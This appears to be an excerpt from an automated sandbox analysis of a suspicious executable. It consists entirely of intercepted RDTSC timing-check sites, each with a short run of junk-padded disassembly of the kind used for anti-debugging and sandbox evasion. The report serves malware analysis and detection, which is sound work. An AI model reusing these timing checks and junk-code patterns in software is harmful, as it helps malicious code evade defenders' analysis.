Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18241BD second address: 18241D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18241D5 second address: 18241D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18241D9 second address: 1824201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 adc di, B364h 0x0000000d push 242A4C86h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jmp 00007F7B99161522h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182430D second address: 1824311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18244BA second address: 18244BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18244BE second address: 18244C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1824A5B second address: 1824A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B99161528h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1824E4F second address: 1824E84 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7B98E54826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7B98E5482Eh 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7B98E54837h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1824E84 second address: 1824E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1824E8A second address: 1824E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18560E7 second address: 18560EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18560EB second address: 18560F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856245 second address: 185624F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7B99161516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185624F second address: 1856280 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7B98E5482Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7B98E54835h 0x00000011 jns 00007F7B98E5482Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856280 second address: 185629A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B9916151Fh 0x00000008 jno 00007F7B99161516h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856856 second address: 1856871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856B04 second address: 1856B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161526h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185D5C8 second address: 185D5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185D5CC second address: 185D5F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 jmp 00007F7B99161527h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185D5F3 second address: 185D604 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B98E5482Ch 0x00000008 ja 00007F7B98E54826h 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C0EB second address: 185C0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C0F4 second address: 185C0FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C21E second address: 185C224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C36B second address: 185C36F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C508 second address: 185C529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B9916151Dh 0x00000008 jmp 00007F7B9916151Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C984 second address: 185C988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C988 second address: 185C9A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F7B99161516h 0x0000000f jne 00007F7B99161516h 0x00000015 popad 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 jc 00007F7B99161516h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C9A9 second address: 185C9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7B98E5482Dh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7B98E54835h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C9DD second address: 185C9E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C9E1 second address: 185C9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185D03B second address: 185D041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185D48D second address: 185D4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F7B98E54837h 0x0000000d pop edx 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185BE0A second address: 185BE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1860E13 second address: 1860E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1860E1A second address: 1860E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1864A2C second address: 1864A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1868F6B second address: 1868F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1868F75 second address: 1868F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7B98E54826h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1868F86 second address: 1868F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1868F8A second address: 1868F90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1868F90 second address: 1868F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F7B99161516h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1869F7F second address: 1869F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B98E54835h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17E91E3 second address: 17E91EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186CD50 second address: 186CD55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186CD55 second address: 186CD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186CEC8 second address: 186CECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186CECE second address: 186CED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186CED4 second address: 186CED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186D02C second address: 186D047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B99161527h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186D047 second address: 186D065 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54830h 0x00000007 jne 00007F7B98E54826h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186D065 second address: 186D069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186D069 second address: 186D092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54838h 0x00000007 jp 00007F7B98E54826h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186F522 second address: 186F544 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7B99161518h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jnl 00007F7B99161516h 0x00000011 push edx 0x00000012 pop edx 0x00000013 jo 00007F7B99161516h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186F544 second address: 186F54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186F54A second address: 186F54E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186F54E second address: 186F567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B98E54833h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1876BC8 second address: 1876BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1876BCC second address: 1876BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1875527 second address: 187553C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jg 00007F7B99161516h 0x0000000b jnp 00007F7B99161516h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187553C second address: 1875548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7B98E54826h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1875663 second address: 187568A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F7B99161531h 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F7B99161529h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1875978 second address: 187597D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1875B0F second address: 1875B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1875B13 second address: 1875B20 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7B98E54826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18247AC second address: 1824844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jg 00007F7B9916152Fh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F7B99161518h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+124958D1h] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F7B99161518h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 jo 00007F7B9916152Ah 0x0000004e call 00007F7B9916151Eh 0x00000053 and di, 4533h 0x00000058 pop ecx 0x00000059 add eax, ebx 0x0000005b cmc 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jp 00007F7B99161516h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1824844 second address: 182484A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1879D7C second address: 1879D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007F7B99161534h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187A189 second address: 187A1B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F7B98E54826h 0x00000009 ja 00007F7B98E54826h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7B98E54838h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187A5AF second address: 187A5C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7B9916151Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187A5C5 second address: 187A5DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54832h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187DA36 second address: 187DA40 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7B99161516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187DA40 second address: 187DA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187DA46 second address: 187DA4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187D369 second address: 187D36F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187D36F second address: 187D373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187D4CF second address: 187D4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B98E54834h 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187D4EF second address: 187D4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 187D79A second address: 187D7B0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7B98E54826h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1884355 second address: 1884359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1884920 second address: 188496F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B98E5482Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jg 00007F7B98E54840h 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F7B98E54836h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188496F second address: 1884975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1884975 second address: 1884979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1884C3E second address: 1884C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7B99161529h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1884F3A second address: 1884F3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1884F3F second address: 1884F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F7B99161516h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1884F50 second address: 1884F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1884F54 second address: 1884F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F7B99161532h 0x0000000e jl 00007F7B9916151Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1884F6A second address: 1884F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F7B98E54826h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18854F4 second address: 18854F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18857A8 second address: 18857C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7B98E54836h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18857C6 second address: 18857E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B99161520h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18857E1 second address: 18857F7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7B98E54826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c jc 00007F7B98E5482Eh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188B2B0 second address: 188B2BC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7B9916151Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188A34F second address: 188A355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
